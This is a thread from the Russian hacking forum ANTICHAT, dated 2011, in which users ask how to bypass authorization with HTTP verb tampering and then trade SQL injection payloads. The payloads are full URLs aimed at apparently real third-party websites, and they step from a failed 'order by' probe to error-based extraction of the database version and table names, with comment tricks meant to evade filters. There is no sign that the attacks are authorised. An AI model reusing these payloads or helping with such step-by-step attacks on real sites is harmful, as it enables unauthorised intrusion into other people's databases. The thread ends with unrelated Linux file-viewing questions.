ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

12.05.2011, 15:59
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме: 19069
Репутация:
0
|
|
вот вот про это где можно почитать, на русском
By manipulating the HTTP verb it was possible to bypass the authorization on this directory. The scanner sent a request with POST HTTP verb and managed to bypass the authorization. An application is vulnerable to HTTP Verb tampering if the following conditions hold:
it uses a security control that lists HTTP verbs
the security control fails to block verbs that are not listed
it has GET functionality that is not idempotent or will execute with an arbitrary HTTP verb
For example, Apache with .htaccess is vulnerable if HTTP verbs are specified using the LIMIT keyword:
является ифективным методом атаки?
|
|
|

12.05.2011, 16:10
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от Koren
вот вот про это где можно почитать, на русском
By manipulating the HTTP verb it was possible to bypass the authorization on this directory. The scanner sent a request with POST HTTP verb and managed to bypass the authorization. An application is vulnerable to HTTP Verb tampering if the following conditions hold:
it uses a security control that lists HTTP verbs
the security control fails to block verbs that are not listed
it has GET functionality that is not idempotent or will execute with an arbitrary HTTP verb
For example, Apache with .htaccess is vulnerable if HTTP verbs are specified using the LIMIT keyword:
является ифективным методом атаки?
Если я не ошибаюсь, то эта уязвимость позволяет обходить basic-авторизацию отправляя запросы постом а не гетом.
https://www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
|
|
|

12.05.2011, 20:08
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
Провел на форуме: 149611
Репутация:
81
|
|
Сообщение от Expl0ited
Когда отключен вывод ошибки, а из-за неверно переданных данных в переменной id рушится запрос к базе, и в ответ ничего не возвращается к выводу, как думаешь возможно?
Код:
http://goldenformula.net/news.php?id=(47)and(1=0)union/*!all*/select(1),2,3,4,version(),6--+
Кстати, можно и так: +and+1=0+union+select+1,2,3,4,database(),6--
|
|
|

12.05.2011, 21:02
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Не получается вывести версию БД.
http://www.postyourlink.info/links10.php?new=1&catid=-52+order+by+5+--+
|
|
|

12.05.2011, 21:21
|
|
Новичок
Регистрация: 08.05.2011
Сообщений: 3
Провел на форуме: 1075
Репутация:
1
|
|
Сообщение от FlaktW
Не получается вывести версию БД.
http://www.postyourlink.info/links10.php?new=1&catid=-52+order+by+5+--+
Код:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+
|
|
|

12.05.2011, 22:00
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Сообщение от raw
Код:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+
Дальше не выводится, а где ошибка не пойму:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((s elect+table_name+from+information_schema.`tables`+ limit+0,1),floor(rand(0)*2))/*!having*/+min(0)+or+1+--+
|
|
|

12.05.2011, 22:12
|
|
Новичок
Регистрация: 08.05.2011
Сообщений: 3
Провел на форуме: 1075
Репутация:
1
|
|
Сообщение от FlaktW
Дальше не выводится, а где ошибка не пойму:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((s elect+table_name+from+information_schema.`tables`+ limit+0,1),floor(rand(0)*2))/*!having*/+min(0)+or+1+--+
Код:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select/*!table_name*/+from+information_schema.tables+limit+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1--+
Ты так и будешь спрашивать каждый следующий шаг? Тогда я пожалуй катапультируюсь из данного трэда.
|
|
|

13.05.2011, 01:29
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме: 58603
Репутация:
3
|
|
Привет всем. Как вывести часть файла..? more что-то не работает.
При cat начало не видно... большой файл.
|
|
|

13.05.2011, 01:33
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме: 1187799
Репутация:
62
|
|
Сообщение от IMMORTAL_S
Привет всем. Как вывести часть файла..? more что-то не работает.
При cat начало не видно... большой файл.
Какая именно ось?
Пробуй less..
Почему в уязвиостях? Или я что-то не понял? о_О
|
|
|

13.05.2011, 01:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от IMMORTAL_S
Привет всем. Как вывести часть файла..? more что-то не работает.
При cat начало не видно... большой файл.
head, tail
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|